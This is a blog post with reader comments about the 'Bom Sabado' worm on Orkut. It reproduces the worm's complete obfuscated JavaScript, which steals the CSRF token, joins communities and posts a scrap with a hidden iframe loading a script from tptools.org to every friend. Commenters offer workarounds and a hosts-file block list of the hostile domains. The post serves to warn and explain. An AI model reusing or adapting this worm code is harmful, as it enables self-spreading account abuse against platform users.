Bom Sabado! Orkut is attacked by a new worm!

In last hour, I have received many scraps form my friends with words “Bom Sabado!”.

Needless to say, these were automated messages from my friends as they don’t know Portuguese. Bom Sabado means Good Saturday in Portuguese.

If you open your scrapbook, same scrap will be sent to all your friends from your account.

So stay away from Orkut till further notice (or use m.orkut.com till then)

UpdateDo not open Orkut as per this official forum thread.

Workaround – Below is a workaround posted by Arikarin. Use at your own risk. I didn’t try it.

A way to get rid of this and even to change your pass if you want to is:

  1. Clear your cookies/cache, then you may get an ‘Automated Query’ message. Don’t hustle about it.
  2. Just logout from your account, if you don’t know about the logout link. Here it is : http://www.orkut.co.in/GLogin?cmd=logout
  3. After that just go to settings page or if not, better to do anything is to switch on to the ‘OLDER VERSION’ of Orkut and try re-setting your password. 🙂

You can use older version of Orkut or simply mobile version at m.orkut.com! I used m.orkut.com only!

Update – Above thread also shows this link – http://tptools.org/worm.js#%3Cwbr%3E#:1

Codes which are responsible for attacks are pasted below as they will be soon gone from above URL! 😉
var _0x37a1=["x4Dx69x63x72x6Fx73x6Fx66x74x2Ex58x4Dx4Cx48x74x74x70","x50x4Fx53x54x5Fx54x4Fx4Bx45x4Ex3D","x43x47x49x2Ex50x4Fx53x54x5Fx54x4Fx4Bx45x4E","x26x73x69x67x6Ex61x74x75x72x65x3D","x50x61x67x65x2Ex73x69x67x6Ex61x74x75x72x65x2Ex72x61x77","x50x4Fx53x54","x53x63x72x61x70x62x6Fx6Fx6Bx3F","x6Fx70x65x6E","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64x3B","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x26x73x63x72x61x70x54x65x78x74x3D","x3Cx73x74x79x6Cx65x2Fx3Ex3Cx69x66x72x61x6Dx65x20x73x74x79x6Cx65x3Dx64x69x73x70x6Cx61x79x3Ax6Ex6Fx6Ex65x20x6Fx6Ex6Cx6Fx61x64x3Dx22x61x20x3Dx20x64x6Fx63x75x6Dx65x6Ex74x2Ex63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x28x20x27x73x63x72x69x70x74x27x29x3Bx61x2Ex73x72x63x20x3Dx20x27x2Fx27x20x2Bx20x27x2Fx74x70x74x6Fx6Fx6Cx73x2Ex6Fx27x2Bx27x72x67x2Fx77x6Fx72x6Dx2Ex6Ax73x27x2Bx27x23x3Cx77x62x72x3Ex23x27x3Bx20x64x6Fx63x75x6Dx65x6Ex74x20x2Ex20x62x6Fx64x79x20x2Ex20x61x70x70x65x6Ex64x43x68x69x6Cx64x28x20x61x20x29x22x3Ex3Cx2Fx69x66x72x61x6Dx65x3Ex42x6Fx6Dx20x53x61x62x61x64x6Fx21","x26x75x69x64x3D","x26x41x63x74x69x6Fx6Ex2Ex73x75x62x6Dx69x74x3Dx31","x73x65x6Ex64","x47x45x54","x52x65x71x75x65x73x74x46x72x69x65x6Ex64x73x3Fx72x65x71x3Dx66x6Cx26x75x69x64x3D","x75x69x64","x26x6Fx78x68x3Dx31","x77x68x69x6Cx65x20x28x74x72x75x65x29x3Bx20x26x26x26x53x54x41x52x54x26x26x26","","x72x65x70x6Cx61x63x65","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x43x6Fx6Dx6Dx75x6Ex69x74x79x4Ax6Fx69x6Ex3Fx63x6Dx6Dx3D","x26x41x63x74x69x6Fx6Ex2Ex6Ax6Fx69x6Ex3Dx31","x31x30x36x36x39x38x38x30x38","x36","x35x35x38x34x39x34","x31x30x36x36x39x38x36x32x38","x31x30x36x36x39x31x33x34x31","x76x61x72x20x66x72x69x65x6Ex64x73x20x3Dx20","x3B","x6Cx69x73x74","x64x61x74x61","x69x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;

9 Replies to “Bom Sabado! Orkut is attacked by a new worm!”

  1. For everyone whose orkut account has been affected with the ‘bom sabado’ worm ….

    The worm injects a hidden iframe containing a malicious javascript http://tptools.org/worm.js [do not click this], which steals the user cookie which contains the password in an encoded form. So the attacker do not get to know your plaintext password but can login using your credentials by impersonating using the cookie to fool the identification system. So a trivial solution is to diable javascript, another solution is to disable iframes or u can take an advanced measure by blocking the domain http://tptools.org/ by editing your hosts file and redirecting it to a safe address, say 127.0.0.1

    go to C:\windows\system32\drivers\etc\
    There is a file named ‘hosts’. By default it is read-only. Go to it properties and uncheck the tickmark beside read-only
    edit it with you favourite editor.

    add this line at the end of it

    127.0.0.1 tptools.org

    save it. and then restart your network interface. ( in simple words, just reconnect your interner connection ) and bingo!! the worm’ll be useless.

    Hope this helps..

    1. How can you be sure that the js file steals cookies? I decoded the obfuscated js and couldn found any cookies stealing there! I mean no json requestion with ur cookie as get parameter! What it does is initiates some AJAX request to the Scrapbook, CommunityJoin etc URLs and post the data to scrap and join the community…

      @Rahul: What do you think about this? I really dont think our cookie is by any means getting fetched!

  2. If u visited the orkut page after the worm attack den immediatly clear cache,cookies…….and change ur password.done! Now u r safe……thank u…….

  3. am i safe ? i got two bomb sabado scraps… i didnt do anything, dont see any automated communities joined…. later when i opened orkut i checked my scrap book and bomb sabado was gone..

    so am i affected ? do i need to change my psw ? i used the google account psw to login to orkut ?

  4. Bom Sabado is spreading like hell

    so whoever are infected first clear your history and cache

    or follow the following steps

    Bom Sabado is spreading fast in Orkut ..Things you should do to avoid getting infected —
    dont open ur scrapbook at all.Disable Java Script in ur browser, thenOpen your Host file with notepad

    Windows 95/98/Me c:\windows\hosts
    Windows NT/2000/XP Pro c:\winnt\system32\drivers\etc\hosts
    Windows XP Home c:\windows\system32\drivers\etc\hosts
    Win 7 – C:\windows\system32\drivers\etc\hosts

    Add this code at the end

    127.0.0.1 tptools*.*org
    127.0.0.1 www*.*tptools*.*org
    127.0.0.1 convites.001webs*.*com
    127.0.0.1 www*.*convites.001webs*.*com

    Then, completely clear ur history including ur cache..by the way they say it is fixed, but do take care …

Comments are closed.